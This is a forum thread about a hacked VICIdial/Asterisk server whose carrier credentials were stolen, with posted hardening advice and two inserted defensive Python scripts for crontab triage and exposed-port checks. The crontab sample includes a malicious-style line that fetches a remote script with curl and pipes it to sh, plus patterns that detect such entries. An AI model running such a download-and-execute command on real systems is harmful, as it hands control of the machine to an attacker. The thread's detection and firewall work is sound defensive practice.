
Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:09 pm
by dspaan
Today I made the stupid mistake of forgetting to start the firewall on a development server, and it was hacked within two hours. They managed to get the registration info from the carrier and start dialing with it. Can anyone point out how they might have done this without SSH access?

The only way I can think of is by direct database access.

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:14 pm
by carpenox
That doesn't make sense, though, because MySQL should be 127.0.0.1 only, right? Check the directory /tmp and tell me what hidden directories you see there.

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:24 pm
by dspaan
You're right, I'm confusing it with another way to access that database, but that still requires SSH.

In /srv/www/htdocs I don't see any new directories, nor in the root directory. I checked the Asterisk messages log and the calls were made directly via the trunk and not through VICIdial.

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:36 pm
by carpenox
check in /tmp - "cd /tmp"

There is a new exploit that loads a small payload file in that directory and runs a bitcoin mining program and a backdoor.

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 5:57 pm
by dspaan
This is what I see:
[image attachment not included]

Re: Asterisk hacked

PostPosted: Mon Aug 31, 2020 8:36 pm
by carpenox
Looks good. You didn't have anything in the access log?

Re: Asterisk hacked

PostPosted: Tue Sep 01, 2020 1:50 am
by dspaan
No, I checked the access log. So I'm still wondering how they acquired those credentials.

Re: Asterisk hacked

PostPosted: Wed Sep 02, 2020 5:27 pm
by mubeen
Check crontab: the exploit carpenox is talking about usually removes entries from crontab and adds its own cron jobs, not only under the names div, div1, etc., but .ICE-unix as well.
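A small crontab triage script, added here as an example (it is not from any poster), that flags the kind of entries mubeen describes: commands run from /tmp, hidden directories such as .ICE-unix, binaries named div/div1, and download-and-pipe-to-shell lines. The crontab text is a constructed sample; in practice you would feed it the output of `crontab -l` for root and the asterisk user plus the files under /etc/cron.d.

```python
import re

# Constructed sample crontab (not from the thread); the first three entries
# stand in for legitimate jobs, the last three mirror what mubeen describes.
SAMPLE_CRONTAB = """\
### VICIDIAL crontab (constructed sample)
* * * * * /usr/share/astguiclient/AST_manager_kill_hung_congested.pl
*/5 * * * * /usr/share/astguiclient/AST_flush_DBqueue.pl -q
0 2 * * * /usr/local/bin/mysql_backup.sh
* * * * * /tmp/.ICE-unix/div1 >/dev/null 2>&1
@reboot /tmp/div
*/10 * * * * curl -s http://203.0.113.10/x.sh | sh
"""

# Each pattern is matched against the command part of an entry only.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"/tmp/"), "runs from /tmp"),
    (re.compile(r"/\.[^/\s]+"), "hidden directory or file in path"),
    (re.compile(r"/div\d*\b"), "binary named div/divN"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"), "downloads and pipes to a shell"),
]

def parse_crontab(text):
    """Yield (schedule, command) pairs; skip comments, blanks and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]+=", line):
            continue
        if line.startswith("@"):                 # @reboot, @daily, ...
            schedule, _, command = line.partition(" ")
        else:                                    # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        yield schedule, command

def flag_suspicious(text):
    """Return [(command, [reasons])] for entries matching at least one pattern."""
    findings = []
    for _, command in parse_crontab(text):
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if pat.search(command)]
        if reasons:
            findings.append((command, reasons))
    return findings

if __name__ == "__main__":
    for command, reasons in flag_suspicious(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS: {command}\n    {'; '.join(reasons)}")
```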

Re: Asterisk hacked

PostPosted: Fri Sep 11, 2020 3:00 pm
by dspaan
I restored a snapshot of the hacked server and checked crontab, but nothing unusual in there. During the exposure we also got this notification from our datacenter, but I assume that's just a standard warning because the firewall was open. Still no idea how they got in and found the carrier credentials.

What is an 'Open Portmapper Server'?
The port mapper (rpc.portmap or rpcbind) is a remote procedure call (RPC) service running on TCP or UDP port 111 that runs on servers to provide information about running services and their corresponding port numbers, such as NFS.

Why would this be bad?
Once an attacker discovers an active port 111 on a device, he can use this information to learn about running services, which is a very important first step for a hacking attack.

Additionally, hackers have also found this feature useful in performing a special type of DDoS attack called an 'Amplification Attack'.

The attacker sends a packet apparently from the intended victim to some server on the Internet that will reply immediately. Because the source IP address is forged, the remote Internet server replies and sends data to the victim.

That has two effects: the actual source of the attack is hidden and is very hard to trace, and, if many Internet servers are used, an attack can consist of an overwhelming number of packets hitting a victim from all over the world.

But what makes reflection attacks really powerful is when they are also amplified: when a small forged packet elicits a large reply from the server (or servers). In that case, an attacker can send a small packet 'from' a forged source IP address and have the server (or servers) send large replies to the victim.

Amplification attacks like that result in an attacker turning a small amount of bandwidth coming from a small number of machines into a massive traffic load hitting a victim from around the Internet.

Recommended action
We recommend that you only allow RPC calls from trusted sources. This can be achieved by dropping all traffic for RPC services on your local firewall and only allowing connections from trusted IP addresses.
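An added check, not from any poster, for the situation the datacenter notice describes: it parses `ss -lntup` style output (a constructed sample here) for services bound on every interface, including rpcbind on port 111 and the MySQL port that carpenox says should be loopback-only, and emits the firewalld rich rules that admit those ports from a trusted range only. The trusted CIDR 203.0.113.0/24 is an assumed placeholder.

```python
import re

# Constructed sample in the shape of `ss -H -lntup` output; not output captured
# from any server in the thread.
SAMPLE_SS = """\
udp   UNCONN 0  0        0.0.0.0:111   0.0.0.0:*  users:(("rpcbind",pid=812,fd=5))
tcp   LISTEN 0  4096     0.0.0.0:111   0.0.0.0:*  users:(("rpcbind",pid=812,fd=4))
tcp   LISTEN 0  80     127.0.0.1:3306  0.0.0.0:*  users:(("mysqld",pid=1290,fd=21))
udp   UNCONN 0  0        0.0.0.0:5060  0.0.0.0:*  users:(("asterisk",pid=1450,fd=12))
tcp   LISTEN 0  128      0.0.0.0:22    0.0.0.0:*  users:(("sshd",pid=901,fd=3))
tcp   LISTEN 0  511            *:443         *:*  users:(("httpd",pid=1102,fd=6))
"""
PORT_NOTES = {  # ports the thread touches on, and why a wildcard bind matters
    111: "portmapper: service enumeration and UDP amplification reflector",
    3306: "MySQL: should answer on 127.0.0.1 only",
    5060: "SIP signalling: registration and brute-force target",
    22: "SSH: brute-force target, restrict to trusted IPs",
}
WILDCARDS = {"0.0.0.0", "*", "[::]", "::"}

def parse_ss(text):
    """Yield (proto, bind_addr, port, process_name) for each socket line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        addr, _, port = parts[4].rpartition(":")
        m = re.search(r'\(\("([^"]+)"', parts[6]) if len(parts) > 6 else None
        yield parts[0], addr, int(port), (m.group(1) if m else "?")

def exposed_services(text, watch=PORT_NOTES):
    """Return {(port, proto): (process, note)} for watched ports bound to any interface."""
    return {(port, proto): (proc, watch[port])
            for proto, addr, port, proc in parse_ss(text)
            if port in watch and addr in WILDCARDS}

def firewalld_rich_rules(exposed, trusted_cidr):
    """firewalld rich rules admitting each exposed port from trusted_cidr only;
    the port must not also be opened zone-wide, or the rule restricts nothing."""
    return [f'rule family="ipv4" source address="{trusted_cidr}" '
            f'port port="{port}" protocol="{proto}" accept'
            for port, proto in sorted(exposed)]

if __name__ == "__main__":
    exposed = exposed_services(SAMPLE_SS)
    for (port, proto), (proc, note) in sorted(exposed.items()):
        print(f"EXPOSED {proto}/{port} ({proc}): {note}")
    for rule in firewalld_rich_rules(exposed, "203.0.113.0/24"):
        print(f"firewall-cmd --permanent --zone=public --add-rich-rule='{rule}'")
```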

Re: Asterisk hacked

PostPosted: Fri Sep 11, 2020 5:33 pm
by carpenox
So one of your services was probably exploited with a 0-day. No way to really tell without the logs.

Re: Asterisk hacked

PostPosted: Fri Sep 11, 2020 5:48 pm
by qeshmja
I used to work with remote administration tools in cybersecurity.
Check if you got infected with malware or a RAT; someone using your carrier doesn't mean they got access to it via VICIdial or Asterisk.
Maybe they got all your SIP info from your e-mail, or you stored your users/passwords etc. in some .txt files, just like every human on this planet.
Or someone got your VICIdial user/password.

Exploiting Asterisk to gain access and use your VoIP provider... nah!
Too much work when there are 100 easier ways.

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 8:55 am
by muratyilmaz.dev
@dspaan I faced a similar situation. Were you able to reach a conclusion?

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 9:53 am
by dspaan
No, I didn't have time to investigate further. All I can say is: change your SSH port to something else and, better yet, use whitelisting.

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 11:50 am
by carpenox
Yes, please secure your servers. I wrote this article a couple of months ago and I cannot stress it enough: please use it, @all

https://cyburityllc.com/?p=1977

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 12:09 pm
by dspaan
Another thing that should be a default step to secure VICIdial is to change the cron password, but I haven't delved deep enough to analyze what the correct procedure is (and the impact of incorrectly changing it). I did find this, but I don't know if this Poundteam script is still up-to-date for the latest VICIdial SVN: http://cc24x7.blogspot.com/2016/04/how- ... e-and.html

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 2:18 pm
by carpenox
You can just change it during the install.pl script and mirror it in Admin > Servers.

But either way it won't matter with an IP whitelist.

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 3:10 pm
by muratyilmaz.dev
Thanks a lot for the information. I skimmed the article. But I don't use a whitelist. My agents and their locations are too many, so customers do not prefer it. I want to use a blacklist and geoblocking.

My problem is:
There is a physical firewall in the datacenter. There, ports 21, 22, 23, 3306 and 5432 are allowed only for my IP address.

They take my SIP information from VICIdial and make a direct call. So it doesn't go out through my Asterisk. With a softphone, they make calls directly using the VoIP account. I am changing the password of my VoIP account. I'm also updating VICIdial.
They're hacking again.

I found resources about an attack on agc/manager_send.php

I don't know if the internal firewall blocks this.

I will get support from an expert tomorrow. I'll let you know the results.

http://support.vicidial.de/mobile.php?p ... w=&lang=en

https://www.youtube.com/watch?v=MWUugOb9z4c&t=43s

Re: Asterisk hacked

PostPosted: Tue Jun 22, 2021 3:27 pm
by dspaan
You should use Dynamic Portal. That way everyone can log in through a special URL and whitelist themselves by logging in, and when they are inactive or their IP changes, it gets automatically removed from the firewall.

Re: Asterisk hacked

PostPosted: Thu Jun 24, 2021 6:52 am
by muratyilmaz.dev
Hi,
Yes. I reviewed Dynamic Portal. I used the links below. Thank you so much.

https://www.youtube.com/watch?v=3ID7IRT3zUE

https://cyburityllc.com/?p=1765

I activated it. Everything is very beautiful. But there is one problem. Most of the agents are old :)

Therefore it is very difficult for me to tell them to use a URL like

https://site.com:446/valid8_or_custom_url.php

Wouldn't it be better if there was only one validation.php file that would be allowed to run under the port 80 or 443 vhosts?

For example:
https://site.com/valid8_or_custom_url.php

I think it's a request against the firewall/vhost logic. I do not know. Maybe something like this in the Apache rules:

Listen on port 80...
Listen on port 443...

If no response, go to port 446.

https://site.com:446/index.php

I think this will go against the method's validation logic. I'm curious about your opinions.
Note: You can reply so that agents can bookmark the validation URL :)

Re: Asterisk hacked

PostPosted: Thu Jun 24, 2021 7:03 am
by dspaan
The URL for Dynamic Portal uses a custom port and a hard-to-guess path deliberately, so it's not obvious for hackers to guess or scan. Otherwise it would defeat the purpose; you could just open up port 80 on your main URL.

Re: Asterisk hacked

PostPosted: Thu Jun 24, 2021 7:20 am
by muratyilmaz.dev
You said "you could just open up port 80 on your main URL".

Can I activate only one page while the whitelist or dynamic method is active?

https://site.com/index.php

Do I need to write a rule like firewall-cmd --zone=public ... for that?